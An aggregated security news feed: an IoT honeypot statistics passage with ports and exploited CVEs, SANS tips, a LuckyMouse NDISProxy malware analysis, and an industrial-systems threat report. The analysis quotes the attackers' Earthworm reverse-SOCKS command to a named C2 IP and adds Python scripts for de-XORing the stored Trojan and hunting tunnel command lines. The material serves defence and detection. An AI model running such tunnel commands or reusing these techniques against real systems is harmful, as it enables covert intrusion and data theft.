TR-069             | 7547     | 0.77%        | RCE in TR-069 implementation                                                                    | Mirai, Hajime
HTTP               | 80       | 0.76%        | Attempts to exploit vulnerabilities in a web server or crack an admin console password          | –
WinBox (RouterOS)  | 8291     | 0.71%        | Used for RouterOS (MikroTik) authentication and WinBox-based attacks                             | Hajime
MikroTik HTTP      | 8080     | 0.23%        | RCE in MikroTik RouterOS < 6.38.5 (Chimay-Red)                                                  | Hajime
MSSQL              | 1433     | 0.21%        | Execution of arbitrary code for certain versions (2000, 2005, 2008); changing administrator password; data theft | –
GoAhead httpd      | 81       | 0.16%        | RCE in GoAhead IP cameras                                                                       | Persirai, Gafgyt
MikroTik HTTP      | 8081     | 0.15%        | Chimay-Red                                                                                      | Hajime
Ethereum JSON-RPC  | 8545     | 0.15%        | Authorization bypass (CVE-2017-12113)                                                           | –
RDP                | 3389     | 0.12%        | Bruteforce                                                                                      | –
XiongMai uc-httpd  | 8000     | 0.09%        | Buffer overflow (CVE-2018-10088) in XiongMai uc-httpd 1.0.0 (some Chinese-made devices)         | Satori
MySQL              | 3306     | 0.08%        | Execution of arbitrary code for certain versions; changing administrator password; data theft   | –

The vast majority of attacks still come from Telnet and SSH password bruteforcing. The third most common are attacks against the SMB service, which provides remote access to files. We haven’t seen IoT malware attacking this service yet. However, some versions of it contain serious known vulnerabilities such as EternalBlue (Windows) and EternalRed (Linux), which were used, for instance, to distribute the infamous Trojan ransomware WannaCry and the Monero cryptocurrency miner EternalMiner.

Here’s the breakdown of infected IoT devices that attacked our honeypots in Q2 2018:

Device        % of infected devices
MikroTik      37.23%
TP-Link        9.07%
SonicWall      3.74%
AV tech        3.17%
Vigor          3.15%
Ubiquiti       2.80%
D-Link         2.49%
Cisco          1.40%
AirTies        1.25%
Cyberoam       1.13%
HikVision      1.11%
ZTE            0.88%
Miele          0.68%
Unknown DVR   31.91%

As can be seen, MikroTik devices running under RouterOS are way out in front. The reason appears to be the Chimay-Red vulnerability. What’s interesting is that our honeypot attackers included 33 Miele dishwashers (0.68% of the total number of attacks). Most likely they were infected through the known (since March 2017) CVE-2017-7240 vulnerability in PST10 WebServer, which is used in their firmware.

Port 7547

Attacks against remote device management (the TR-069 specification) on port 7547 are highly common. According to Shodan, there are more than 40 million devices in the world with this port open, even though a vulnerability in this service recently knocked around a million Deutsche Telekom routers offline, not to mention helping to spread the Mirai and Hajime malware families.

Another type of attack exploits the Chimay-Red vulnerability in MikroTik routers running RouterOS versions below 6.38.5. In March 2018, it played an active part in distributing Hajime.

IP cameras

IP cameras are also on the cybercriminal radar. In March 2017, several major vulnerabilities were detected in the software of GoAhead devices, and a month after information about it was published, there appeared new versions of the Gafgyt and Persirai Trojans exploiting these vulnerabilities. Just one week after these malicious programs were actively distributed, the number of infected devices climbed to 57,000.

On June 8, 2018, a proof-of-concept was published for the CVE-2018-10088 vulnerability in the XiongMai uc-httpd web server, used in some Chinese-made smart devices (for example, KKMoon DVRs). The next day, the number of logged attempts to locate devices using this web server more than tripled. The culprit for this spike in activity was the Satori Trojan, known for previously attacking GPON routers.

New malware and threats to end users

DDoS attacks

As before, the primary purpose of IoT malware deployment is to perpetrate DDoS attacks. Infected smart devices become part of a botnet that attacks a specific address on command, depriving the host of the ability to correctly handle requests from real users. Such attacks are still deployed by Trojans from the Mirai family and its clones, in particular, Hajime.

This is perhaps the least harmful scenario for the end user. The worst (and very unlikely) thing that can happen to the owner of the infected device is being blocked by their ISP. And the device can often be “cured” with a simple reboot.

Cryptocurrency mining

Another type of payload is linked to cryptocurrencies. For instance, IoT malware can install a miner on an infected device. But given the low processing power of smart devices, the feasibility of such attacks remains in doubt, even despite their potentially large number.

A more devious and doable method of getting a couple of cryptocoins was invented by the creators of the Satori Trojan. Here, the victim IoT device acts as a kind of key that opens access to a high-performance PC:

  • At the first stage, the attackers try to infect as many routers as possible using known vulnerabilities, in particular:
    • CVE-2014-8361 – RCE in the miniigd SOAP service in Realtek SDK
    • CVE-2017-17215 – RCE in the firmware of Huawei HG532 routers
    • CVE-2018-10561, CVE-2018-10562 – authorization bypass and execution of arbitrary commands on Dasan GPON routers
    • CVE-2018-10088 – buffer overflow in XiongMai uc-httpd 1.0.0 used in the firmware of some routers and other smart devices made by some Chinese manufacturers
  • Using compromised routers and the CVE-2018-1000049 vulnerability in the Claymore Ethereum miner remote management tool, they substitute the wallet address for their own.
Data theft

The VPNFilter Trojan, detected in May 2018, pursues other goals, above all intercepting infected device traffic, extracting important data from it (user names, passwords, etc.), and sending it to the cybercriminals’ server. Here are the main features of VPNFilter:

  • Modular architecture. The malware creators can fit it out with new functions on the fly. For instance, in early June 2018 a new module was detected that is able to inject JavaScript code into intercepted web pages.
  • Reboot resistant. The Trojan writes itself to the standard Linux crontab job scheduler, and can also modify the configuration settings in the non-volatile memory (NVRAM) of the device.
  • Uses Tor for communication with the C&C.
  • Able to self-destruct and disable the device. On receiving the command, the Trojan deletes itself, overwrites the critical part of the firmware with garbage data, and then reboots the device.

The Trojan’s distribution method is still unknown: its code contains no self-propagation mechanisms. However, we are inclined to believe that it exploits known vulnerabilities in device software for infection purposes.

The very first VPNFilter report spoke of around 500,000 infected devices. Since then, even more have appeared, and the list of manufacturers of vulnerable gadgets has expanded considerably. As of mid-June, it included the following brands:

  • ASUS
  • D-Link
  • Huawei
  • Linksys
  • MikroTik
  • Netgear
  • QNAP
  • TP-Link
  • Ubiquiti
  • Upvel
  • ZTE

The situation is made worse by the fact that these manufacturers’ devices are used not only in corporate networks, but often as home routers.


Smart devices are on the rise, with some forecasts suggesting that by 2020 their number will exceed the world’s population several times over. Yet manufacturers still don’t prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions, and the updating process itself can be complex for the average user. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage Internet traffic, others shoot video footage, still others control domestic devices (for example, air conditioning).

Malware for smart devices is increasing not only in quantity, but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to steal personal data and mine cryptocurrencies, on top of traditional DDoS attacks.

Here are some simple tips to help minimize the risk of smart device infection:

  • Don’t give access to the device from an external network unless absolutely necessary
  • Periodic rebooting will help get rid of malware already installed (although in most cases the risk of reinfection will remain)
  • Regularly check for new firmware versions and update the device
  • Use complex passwords at least 8 characters long, including upper and lower-case letters, numerals, and special characters
  • Change the factory passwords at initial setup (even if the device does not prompt you to do so)
  • Close/block unused ports, if there is such an option. For example, if you don’t connect to the router via Telnet (port TCP:23), it’s a good idea to disable it so as to close off a potential loophole to intruders.

Trust Your Instincts

SANS Tip of the Day - Tue, 09/18/2018 - 01:00
Ultimately, common sense is your best protection. If an email, phone call or online message seems odd, suspicious or too good to be true, it may be an attack.

Social Media Privacy Settings

SANS Tip of the Day - Fri, 09/14/2018 - 01:00
Privacy settings on social networks have limited value. They are confusing to configure and change often. Ultimately, if you do not want your parents or boss reading it, do not post it.

LuckyMouse signs malicious NDISProxy driver with certificate of Chinese IT company

Malware Alerts - Mon, 09/10/2018 - 06:00

What happened?

Since March 2018 we have discovered several infections where a previously unknown Trojan was injected into the lsass.exe system process memory. These implants were injected by the digitally signed 32- and 64-bit network filtering driver NDISProxy. Interestingly, this driver is signed with a digital certificate that belongs to Chinese company LeagSoft, a developer of information security software based in Shenzhen, Guangdong. We informed the company about the issue via CN-CERT.

The campaign described in this report was active immediately prior to a Central Asian high-level meeting, and we suppose that the actor behind it still follows the regional political agenda.

Which malicious modules are used?

The malware consists of three different modules:

  • A custom C++ installer that decrypts and drops the driver file in the corresponding system directory, creates a Windows autorun service for driver persistence and adds the encrypted in-memory Trojan to the system registry.
  • A network filtering driver (NDISProxy) that decrypts and injects the Trojan into memory and filters port 3389 (Remote Desktop Protocol, RDP) traffic in order to insert the Trojan’s C2 communications into it.
  • A last-stage C++ Trojan acting as HTTPS server that works together with the driver. It waits passively for communications from its C2, with two possible communication channels via ports 3389 and 443.

NDISProxy driver and RAT work together once the installer has set up all the modules

These modules allow attackers to move laterally in the infected infrastructure silently, but do not let them communicate with an external C2 when the newly infected host only has a LAN IP address. Because of this, the operators used the Earthworm SOCKS tunneler to connect the LAN of the infected host to the external C2. They also used the Scanline network scanner to find hosts with file shares (scanning TCP port 135, the RPC endpoint mapper; the SMB file-sharing service itself listens on TCP 139 and 445), which they use to spread the malware with administrative passwords captured by keyloggers.

We assess with high confidence that NDISProxy is a new tool used by LuckyMouse. Kaspersky Lab products detect the described artefacts. For more information please contact:

How does it spread?

We detected the distribution of the 32-bit dropper used for this campaign among different targets by the end of March 2018. However, we didn’t observe any spear phishing or watering hole activity. We believe the operators spread their infectors through networks that were already compromised instead.

How does it work?

Custom installer

Installer MD5 hash                 Timestamp (GMT)       Size      Bits
dacedff98035f80711c61bc47e83b61d   2018.03.29 07:35:55   572 244   32
9dc209f66da77858e362e624d0be86b3   2018.03.26 04:16:00   572 244   32
3cbeda2c5ac41cca0b0d60376a2b2511   2018.03.26 04:16:00   307 200   32

The initial infectors are 32-bit portable executable files capable of installing 32-bit or 64-bit drivers depending on the target. The installer logs all the installation process steps in the load.log file within the same directory. It checks if the OS is Windows Vista or above (major version equal to 6 or higher) and decrypts its initial configuration using the DES (Data Encryption Standard) algorithm.

The set of well-known port numbers (HTTP, HTTPS, SMB, POP3S, MSSQL, PPTP and RDP) in the configuration is not used, which along with the “[test]” strings in messages suggests this malware is still under development.

The installer creates a semaphore (name depending on configuration) Global\Door-ndisproxy-mn and checks if the service (name also depends on configuration) ndisproxy-mn is already installed. If it is, the dropper writes “door detected” in load.log. The autorun Windows service running NDISProxy is the “door” in developer terms.

The installer also decrypts (using the same DES key) the shellcode of the last-stage Trojan and stores it, XOR-encrypted with a six-byte key, in three registry values named xxx0, xxx1, xxx2 under the key HKLM\SOFTWARE\Classes\32ndisproxy-mn (or 64ndisproxy-mn for 64-bit hosts). The DES-encrypted configuration is saved as the value filterpd-ndisproxy-mn in the registry key HKCR\ndisproxy-mn.

Initial installer saves XOR-encrypted Trojan’s shellcode and DES-encrypted configuration in system registry

The installer creates the corresponding autostart service and registry keys. The “Altitude” registry value (unique ID for the minifilter driver) is set to 321 000, which means “FSFilter Anti-Virus” in Windows terms:

NDISProxy network filtering driver

Driver MD5 hash                    Timestamp             Size     Bits
8e6d87eadb27b74852bd5a19062e52ed   2018.03.29 07:33:58   40400    64
d21de00f981bb6b5094f9c3dfa0be533   2018.03.29 07:33:52   33744    32
a2eb59414823ae00d53ca05272168006   2018.03.26 04:15:28   40400    64
493167e85e45363d09495d0841c30648   2018.03.26 04:15:21   33744    32
ad07b44578fa47e7de0df42a8b7f8d2d   2017.11.08 08:04:50   241616   64

This digitally signed driver is the most interesting artefact used in this campaign. The network filtering modules serve two purposes: first they decrypt and inject the RAT; second, they set its communication channel through RDP port 3389.

The drivers are signed with a digital certificate issued by VeriSign to LeagSoft, a company developing information security software such as data loss prevention (DLP) solutions.

This driver makes extensive use of third-party publicly available C source code, including from the Blackbone repository available at GitHub.

Feature                         Public repository
Driver memory injection         Blackbone
NDIS network filtering driver   Microsoft Windows Driver Kit (WDK) sample code “Windows Filtering Platform Stream Edit Sample/C++/sys/stream_callout.c”
Parse HTTP packets              http-parser

The driver again checks that the Windows version is Vista or higher, then creates a device named \Device\ndisproxy-%s (where the word after the hyphen varies – see the Appendix for all variants) and its corresponding symbolic link \DosDevices\Global\ndisproxy-%s.

The driver combines all the Trojan-related registry values from HKLM\SOFTWARE\Classes\32ndisproxy-mn and de-XORs them with a six-byte hardcoded value. It then injects the resulting Trojan executable shellcode into lsass.exe memory using Blackbone library functions.
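For an analyst who has an offline registry export from an infected host, the steps just described (concatenate xxx0, xxx1, xxx2 in order, strip a six-byte repeating XOR) are enough to recover the in-memory Trojan without running the driver. The script below is an added example and is not code from the report or from the malware. Since the report does not publish the XOR key, the example also shows how to recover it by known plaintext when the first six bytes of the shellcode are known. Everything in it that looks like a sample is constructed: the .reg export is generated by the script itself, the key 1337c0debabe is invented, and the “call $+5 / pop ebx” get-PC stub is an assumed known plaintext, not something the report attributes to this sample.

```python
"""Pull the NDISProxy last-stage payload out of a registry export and de-XOR it.

Added example, not code from the Kaspersky Lab report or from the malware.
Per the report, the driver concatenates the values xxx0, xxx1, xxx2 under
HKLM\\SOFTWARE\\Classes\\32ndisproxy-mn and XORs them with a hardcoded
six-byte key. The key, payload and export below are all constructed.
"""
import re

KEY_PATH = r"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\32ndisproxy-mn"
VALUE_NAMES = ("xxx0", "xxx1", "xxx2")      # concatenated in this order
KEY_LEN = 6                                  # six-byte key, per the report

# Constructed test data (assumptions, not indicators from the report).
SAMPLE_KEY = bytes.fromhex("1337c0debabe")
SAMPLE_PAYLOAD = (bytes.fromhex("e8000000005b")   # call $+5; pop ebx: assumed known prefix
                  + b"[test] constructed payload, not the real shellcode " * 2)


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applying it twice with the same key is the identity."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def _hex_list_to_bytes(s: str) -> bytes:
    return bytes(int(h, 16) for h in s.split(",") if h.strip())


def parse_reg_export(text: str, key_path: str = KEY_PATH) -> dict:
    """Return {value_name: bytes} for every "name"=hex:... value under key_path.

    regedit wraps long REG_BINARY values: a line ending in a backslash is
    continued on the next, indented line.
    """
    values, in_key, pending = {}, False, None   # pending = (name, [hex chunks])
    for line in text.splitlines():
        if pending is not None:
            body = line.strip()
            pending[1].append(body.rstrip("\\"))
            if not body.endswith("\\"):
                name, chunks = pending
                values[name] = _hex_list_to_bytes("".join(chunks))
                pending = None
            continue
        if line.startswith("["):
            in_key = line.strip() == f"[{key_path}]"
            continue
        if not in_key:
            continue
        m = re.match(r'^"([^"]+)"=hex:(.*)$', line.strip())
        if m is None:
            continue
        name, body = m.group(1), m.group(2).strip()
        if body.endswith("\\"):
            pending = (name, [body.rstrip("\\")])
        else:
            values[name] = _hex_list_to_bytes(body)
    return values


def extract_payload(values: dict, key: bytes) -> bytes:
    """Concatenate xxx0..xxx2 as the driver does and strip the XOR layer."""
    missing = [n for n in VALUE_NAMES if n not in values]
    if missing:
        raise KeyError(f"export lacks registry values: {missing}")
    return xor_repeating(b"".join(values[n] for n in VALUE_NAMES), key)


def recover_key(values: dict, known_prefix: bytes) -> bytes:
    """Known-plaintext attack: ciphertext[:6] XOR plaintext[:6] is the whole key."""
    if len(known_prefix) < KEY_LEN:
        raise ValueError(f"need at least {KEY_LEN} known plaintext bytes")
    blob = b"".join(values[n] for n in VALUE_NAMES)
    return bytes(c ^ p for c, p in zip(blob[:KEY_LEN], known_prefix[:KEY_LEN]))


def make_sample_export(payload: bytes, key: bytes, key_path: str = KEY_PATH) -> str:
    """Write a .reg file the way regedit would, with the XOR-encrypted payload
    split across the three values. Constructed fixture for exercising the parser."""
    enc = xor_repeating(payload, key)
    n = len(enc)
    parts = (enc[: n // 3], enc[n // 3: 2 * n // 3], enc[2 * n // 3:])
    lines = ["Windows Registry Editor Version 5.00", "", f"[{key_path}]"]
    for name, part in zip(VALUE_NAMES, parts):
        hexs = [f"{b:02x}" for b in part]
        rows = [",".join(hexs[i:i + 8]) for i in range(0, len(hexs), 8)]
        lines.append(f'"{name}"=hex:' + ",\\\n  ".join(rows))
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    export = make_sample_export(SAMPLE_PAYLOAD, SAMPLE_KEY)
    vals = parse_reg_export(export)
    key = recover_key(vals, SAMPLE_PAYLOAD[:KEY_LEN])
    print("recovered key:", key.hex())
    print("payload starts:", extract_payload(vals, key)[:40])
```

Against a real export you would feed parse_reg_export() the file saved from regedit (or from a hive parsed offline) and either supply the key pulled from the driver’s disassembly or, if the shellcode’s first bytes are already known from another sample, let recover_key() derive it; the 64-bit variant lives under 64ndisproxy-mn and needs only a different key_path.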

NDISProxy works as a network traffic filter engine, filtering the traffic going through RDP port 3389 (the port number is hardcoded) and injecting messages into it.

The communication between the user-mode in-memory Trojan and the driver goes through the custom control codes used by the DeviceIoControl() Windows API function. Apart from the auxiliary codes, there are two codes worth mentioning:

Driver control code   Meaning
0x222400              Start traffic filtering at RDP port 3389
0x22240C              Inject given data into the filtered TCP stream. Used for Trojan communication with C2

In-memory C++ Trojan

SHA256     c69121a994ea8ff188510f41890208625710870af9a06b005db817934b517bc1
MD5        6a352c3e55e8ae5ed39dc1be7fb964b1
Compiled   2018.03.26 04:15:48 (GMT)
Type       I386 Windows GUI DLL
Size       175 616

Please note this Trojan exists in memory only; the data above is for the decrypted Windows registry content without the initial shellcode
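The two control codes in the table carry more information than the table shows, because Windows packs every IOCTL with the CTL_CODE macro as (DeviceType << 16) | (Access << 14) | (Function << 2) | Method and reserves function numbers below 0x800 for its own use. The script below is an added example, not code from the report; the control-code meanings are the report’s and the field names are Microsoft’s. Decoding 0x222400 and 0x22240C this way tells you, before opening the driver in a disassembler, that both are vendor-defined functions (0x900 and 0x903) on FILE_DEVICE_UNKNOWN, use METHOD_BUFFERED, and require FILE_ANY_ACCESS, i.e. any user-mode process that can open \DosDevices\Global\ndisproxy-%s can issue them without holding read or write rights on the handle.

```python
"""Decode the NDISProxy I/O control codes into their CTL_CODE fields.

Added example, not from the report. Field layout is the Windows CTL_CODE macro.
"""
DEVICE_TYPES = {
    0x07: "FILE_DEVICE_DISK", 0x09: "FILE_DEVICE_FILE_SYSTEM",
    0x12: "FILE_DEVICE_NETWORK", 0x17: "FILE_DEVICE_PHYSICAL_NETCARD",
    0x22: "FILE_DEVICE_UNKNOWN",
}
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
           2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS",
          2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}

# The two codes and their meanings as given in the report's table.
NDISPROXY_IOCTLS = {
    0x222400: "start traffic filtering on RDP port 3389",
    0x22240C: "inject given data into the filtered TCP stream (C2 channel)",
}


def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    """Python port of the CTL_CODE macro from the Windows DDK headers."""
    if not (0 <= device_type <= 0xFFFF and 0 <= function <= 0xFFF
            and 0 <= method <= 3 and 0 <= access <= 3):
        raise ValueError("CTL_CODE field out of range")
    return (device_type << 16) | (access << 14) | (function << 2) | method


def decode_ioctl(code: int) -> dict:
    """Split a 32-bit IOCTL back into device type, access, function and method."""
    if not 0 <= code <= 0xFFFFFFFF:
        raise ValueError("not a 32-bit control code")
    device_type = code >> 16
    access = (code >> 14) & 3
    function = (code >> 2) & 0xFFF
    method = code & 3
    return {
        "device_type": device_type,
        "device_type_name": DEVICE_TYPES.get(device_type, f"0x{device_type:x}"),
        "access": ACCESS[access],
        "function": function,
        "vendor_defined": function >= 0x800,   # 0x000-0x7FF reserved by Microsoft
        "method": METHODS[method],
    }


def reachable_without_rights(code: int) -> bool:
    """True if the IOCTL needs no read/write access on the device handle."""
    return decode_ioctl(code)["access"] == "FILE_ANY_ACCESS"


def triage(ioctls: dict) -> list:
    """One summary line per control code, sorted, for a triage note."""
    rows = []
    for code, meaning in sorted(ioctls.items()):
        d = decode_ioctl(code)
        rows.append(f"0x{code:06X} fn=0x{d['function']:03X} {d['device_type_name']} "
                    f"{d['method']} {d['access']}  {meaning}")
    return rows


if __name__ == "__main__":
    for row in triage(NDISPROXY_IOCTLS):
        print(row)
```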

This RAT is decrypted by the NDISProxy driver from the system registry and injected into the memory of the lsass.exe process. The code starts with a shellcode stub: instead of relying on the standard Windows PE loader, the malware maps its own image into memory itself.

This Trojan is a full-featured RAT capable of executing common tasks such as command execution and downloading/uploading files. This is implemented through a couple of dozen C++ classes such as CMFile, CMProcess, TFileDownload, TDrive, TProcessInfo, TSock, etc. The first-stage custom installer uses the same classes. The Trojan uses the HTTP Server API to filter HTTPS packets on port 443 and parse commands.

The Trojan is an HTTP server, allowing LAN connection. It uses a SOCKS tunneler to communicate with the C2

This Trojan is used by attackers to gather a target’s data, make lateral movements and create SOCKS tunnels to their C2 using the Earthworm tunneler. This tool is publicly available and popular among Chinese-speaking actors. Given that the Trojan is an HTTPS server itself, we believe that the SOCKS tunnel is used for targets without an external IP, so the C2 is able to send commands.

Who’s behind it and why?

We found that this campaign targeted Central Asian government entities. We believe the attack was highly targeted and was linked to a high-level meeting. We assess with high confidence that the Chinese-speaking LuckyMouse actor is responsible for this new campaign using the NDISProxy tool described in this report.

In particular, the choice of the Earthworm tunneler is typical for Chinese-speaking actors. Also, one of the commands used by the attackers (“-s rssocks -d 103.75.190[.]28 -e 443”) creates a tunnel to a previously known LuckyMouse C2. The choice of victims in this campaign also aligns with the previous interests shown by this actor.
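The Earthworm command quoted above is a good hunting pattern precisely because the tool’s option grammar (-s mode, -d/-e connect target, -l listen port, -f/-g forward target) survives renaming of the binary. The script below is an added example, not code from the report: it scans constructed Sysmon-style process-creation records for that grammar, extracts the tunnel type and endpoints, and checks the remote end against the C2 named above. The log format and the binary names (update.exe, ew.exe) are assumptions; 103.75.190[.]28 is kept defanged in the sample and refanged only for matching.

```python
"""Hunt for Earthworm (ew) tunneler invocations in process-creation logs and
extract the C2 endpoint, e.g. from "-s rssocks -d <C2> -e 443".

Added example, not from the report. Option grammar is Earthworm's own;
the log records and file names are constructed.
"""
import re

# Earthworm's six operating modes.
EW_MODES = {"ssocksd", "rcsocks", "rssocks", "lcx_listen", "lcx_tran", "lcx_slave"}
KNOWN_C2 = {"103.75.190.28"}   # C2 named in the report, refanged for matching

# Constructed Sysmon-style process-creation records (not real telemetry).
SAMPLE_PROCESS_LOG = r"""
2018-04-02 09:14:02 host=WS-17 image=C:\Windows\Temp\update.exe cmdline="update.exe -s rssocks -d 103.75.190[.]28 -e 443"
2018-04-02 09:14:40 host=WS-17 image=C:\Windows\System32\PING.EXE cmdline="ping -n 1 10.10.8.1"
2018-04-02 10:02:11 host=WS-03 image=C:\Program Files\Git\bin\git.exe cmdline="git.exe -s status"
2018-04-02 11:30:00 host=SRV-01 image=C:\tools\ew.exe cmdline="ew.exe -s lcx_tran -l 1080 -f 10.10.8.20 -g 3389"
"""

RECORD_RE = re.compile(
    r'^(?P<ts>\S+ \S+) host=(?P<host>\S+) image=(?P<image>.+?) cmdline="(?P<cmd>[^"]*)"$'
)


def refang(s: str) -> str:
    return s.replace("[.]", ".")


def defang(s: str) -> str:
    return s.replace(".", "[.]")


def parse_earthworm(argv: list):
    """Return tunnel parameters if argv follows Earthworm's option grammar, else None."""
    opts = {}
    i = 1
    while i < len(argv):
        tok = argv[i]
        if len(tok) == 2 and tok[0] == "-" and i + 1 < len(argv):
            opts[tok[1]] = argv[i + 1]
            i += 2
        else:
            i += 1
    mode = opts.get("s")
    if mode not in EW_MODES:
        return None

    def endpoint(host_opt, port_opt):
        if host_opt in opts and port_opt in opts and opts[port_opt].isdigit():
            return refang(opts[host_opt]), int(opts[port_opt])
        return None

    return {
        "mode": mode,
        "remote": endpoint("d", "e"),    # host dials out here (rssocks, lcx_slave)
        "forward": endpoint("f", "g"),   # traffic is relayed here (lcx_tran, lcx_slave)
        "listen": int(opts["l"]) if opts.get("l", "").isdigit() else None,
    }


def describe(tunnel: dict) -> str:
    mode = tunnel["mode"]
    if mode == "rssocks":
        return "reverse SOCKS: host dials out to the C2, which gains SOCKS access into the LAN"
    if mode == "lcx_slave":
        return "reverse port forward: host dials out and relays the C2 to an internal service"
    if mode == "lcx_tran":
        return "local port forward: listener relays connections to an internal service"
    if mode in ("rcsocks", "lcx_listen"):
        return "relay-side listener: this host is being used as a pivot for reverse connections"
    return "local SOCKS proxy listener"


def scan_process_log(text: str, known_c2: set = KNOWN_C2) -> list:
    """Return one hit per record whose command line parses as an Earthworm tunnel."""
    hits = []
    for line in text.splitlines():
        m = RECORD_RE.match(line)
        if m is None:
            continue
        tunnel = parse_earthworm(m["cmd"].split())
        if tunnel is None:
            continue
        remote_ip = tunnel["remote"][0] if tunnel["remote"] else None
        hits.append({"time": m["ts"], "host": m["host"], "image": m["image"],
                     "known_c2": remote_ip in known_c2,
                     "summary": describe(tunnel), **tunnel})
    return hits


if __name__ == "__main__":
    for h in scan_process_log(SAMPLE_PROCESS_LOG):
        remote = f"{defang(h['remote'][0])}:{h['remote'][1]}" if h["remote"] else "-"
        print(f"{h['time']} {h['host']:7} {h['mode']:10} remote={remote} "
              f"known_c2={h['known_c2']}  {h['summary']}")
```

Two of the four constructed records are flagged: the renamed update.exe running in reverse-SOCKS mode towards the known C2 on 443, and an ew.exe local port forward from 1080 to RDP on an internal host. The git.exe line, which also happens to contain -s, is not a hit because its mode argument is not one of Earthworm’s.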

Consistent with current trends

We have observed a gradual shift in several Chinese-speaking campaigns towards a combination of publicly available tools (such as Metasploit or CobaltStrike) and custom malware (like the C++ last stage RAT described in this report). We have also observed how different actors adopt code from GitHub repositories on a regular basis. All this combines to make attribution more difficult.

This campaign appears to demonstrate once again LuckyMouse’s interest in Central Asia and the political agenda surrounding the Shanghai Cooperation Organization.

Indicators of Compromise

Note: The indicators in this section are valid at the time of publication. Any future changes will be updated directly in the corresponding .ioc file.

File Hashes



Auxiliary Earthworm SOCKS tunneler and Scanline network scanner

Domains and IPs






Registry keys and values


Driver certificate

A lot of legitimate LeagSoft products are signed with the following certificate. Please don’t consider all signed files as malicious.

Subject         ShenZhen LeagSoft Technology Co.,Ltd.
Serial number   78 62 07 2d dc 75 9e 5f 6a 61 4b e9 b9 3b d5 21
Issuer          VeriSign Class 3 Code Signing 2010 CA
Valid to        2018-07-19

Threat Landscape for Industrial Automation Systems in H1 2018

Malware Alerts - Thu, 09/06/2018 - 06:00

For many years, Kaspersky Lab experts have been uncovering and researching cyberthreats that target a variety of information systems – those of commercial and government organizations, banks, telecoms operators, industrial enterprises, and individual users. In this report, Kaspersky Lab Industrial Control Systems Cyber Emergency Response Team (Kaspersky Lab ICS CERT) publishes the findings of its research on the threat landscape for industrial automation systems conducted during the first half of 2018.

The main objective of these publications is to provide information support to global and local incident response teams, enterprise information security staff and researchers in the area of industrial facility security.

Key events

Energetic Bear/Crouching Yeti: attacks on servers

In February, Kaspersky Lab ICS CERT published a report on an investigation into the initial infection tactics used by the notorious APT group Energetic Bear/Crouching Yeti, as well as the results of an analysis of several web servers compromised by the group in 2016 and early 2017, using information provided by the server owners.

Energetic Bear/Crouching Yeti has been active since at least 2010, attacking companies and individuals in various countries. The specialists at CrowdStrike initially noted a strong focus on the energy and industrial sectors, which may explain the name Energetic Bear. Later, when the diversity of the group’s attacks became clearer, the researchers at Kaspersky Lab named it Crouching Yeti. The targets of the attacks are mainly concentrated in Europe and the US. Recently, the number of attacks on companies in Turkey increased significantly. According to US-CERT and the UK National Cyber Security Centre, the Energetic Bear/Crouching Yeti APT group is linked to the Russian government.

The group’s initial infection tactic is a multi-step process that begins with phishing emails carrying malicious documents and with the infection of various servers. Some infected servers are used by the group as auxiliaries, only for hosting various tools. Others are infected so they can be used in watering hole attacks, with some servers hosting an SMB link that leads to other servers that steal the authentication data of potential victims.

With some rare exceptions, the Energetic Bear/Crouching Yeti group uses publicly available tools to carry out their attacks. All the utilities discovered by the Kaspersky Lab ICS CERT experts have open source code that is freely available on GitHub. This makes the task of attack attribution very difficult without additional group “markers”.

In most cases observed by Kaspersky Lab ICS CERT, the attackers performed tasks to identify vulnerabilities, gain persistence on different nodes and steal authentication data in order to develop the attack further.

An analysis of the compromised servers and the attacks on them showed that for Energetic Bear/Crouching Yeti, almost any vulnerable server on the internet is seen as a potential foothold from which to develop targeted attacks.

The investigation into the initial, intermediate and subsequent targets of these attacks also revealed a diverse geography. The largest number of victims and targets was in Russia, followed by Turkey and Ukraine. Under half of the systems attacked were related to industry, agricultural services and utilities.

Attacks on industrial enterprises using RATs

Kaspersky Lab ICS CERT reported on yet another wave of phishing emails containing malicious attachments aimed primarily at industrial enterprises in Russia. The malicious program used in the attacks installs legitimate software for remote administration – TeamViewer or Remote Manipulator System/Remote Utilities (RMS) – that allows attackers to gain remote control over the targeted systems. Various techniques are used to mask the presence and activity of the unauthorized software.

When they need to move further within a compromised network, the attackers can download an additional set of malicious programs, which is specifically tailored to the attack on each individual victim. This set of malware may contain spyware, additional remote administration tools, software to exploit vulnerabilities in the operating system and application software, as well as the Mimikatz utility, which makes it possible to obtain account data for Windows accounts.

Also, Kaspersky Lab products blocked multiple attacks on the industrial network of an automobile manufacturer and service company, in particular, on computers designed to diagnose the engines and onboard systems of trucks and heavy-duty vehicles.

A RAT was installed and intermittently used on at least one of the computers in the company’s industrial network. Over a period of several months, numerous attempts to launch various malicious programs using the RAT were blocked on the computer. The blocked programs included modifications of the malware detected by Kaspersky Lab products as When launched this worm immediately begins to proliferate on the local network using exploits for the MS17-010 vulnerabilities – the same ones that were published by ShadowBrokers in the spring of 2017 and were used in attacks by the infamous WannaCry and ExPetr cryptors.

The Trojan-Downloader.Nymaim malware family was also blocked. Representatives of this family are often used to download modifications of the Necurs family botnet agent, which in turn is used to infect computers with ransomware from the Locky family.

All statistical data used in this report was collected using the Kaspersky Security Network (KSN), a distributed antivirus network. The data was received from those KSN users who gave their consent to have data anonymously transferred from their computers. We do not identify the specific companies/organizations sending statistics to KSN, due to the product limitations and regulatory restrictions.

The data was received from ICS computers protected by Kaspersky Lab products that Kaspersky Lab ICS CERT categorizes as part of the industrial infrastructure at organizations. This group includes Windows computers that perform one or several of the following functions:

  • supervisory control and data acquisition (SCADA) servers;
  • data storage servers (Historian);
  • data gateways (OPC);
  • stationary workstations of engineers and operators;
  • mobile workstations of engineers and operators;
  • Human Machine Interface (HMI).

The statistics analyzed also include data received from computers of industrial control network administrators and software developers who develop software for industrial automation systems.

